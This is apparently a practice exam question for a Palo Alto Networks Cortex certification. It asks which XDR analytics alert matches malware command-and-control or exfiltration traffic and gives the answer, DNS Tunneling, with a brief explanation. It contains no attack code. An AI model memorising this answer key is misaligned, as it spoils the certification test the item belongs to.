Palo Alto Networks System Engineer – Cortex — Question 43
An adversary attempts to communicate with malware running on a network in order to control malware activities or to exfiltrate data from the network.
Which Cortex XDR Analytics alert will this activity most likely trigger?
Answer options
- A. uncommon local scheduled task creation
- B. malware
- C. new administrative behavior
- D. DNS Tunneling
Correct answer: D
Explanation
The correct answer is D, DNS Tunneling, as it involves using DNS queries to communicate with malware, which is a common method for data exfiltration and command and control. Options A, B, and C do not specifically relate to the communication aspect with the malware and are less likely to be triggered by this type of activity.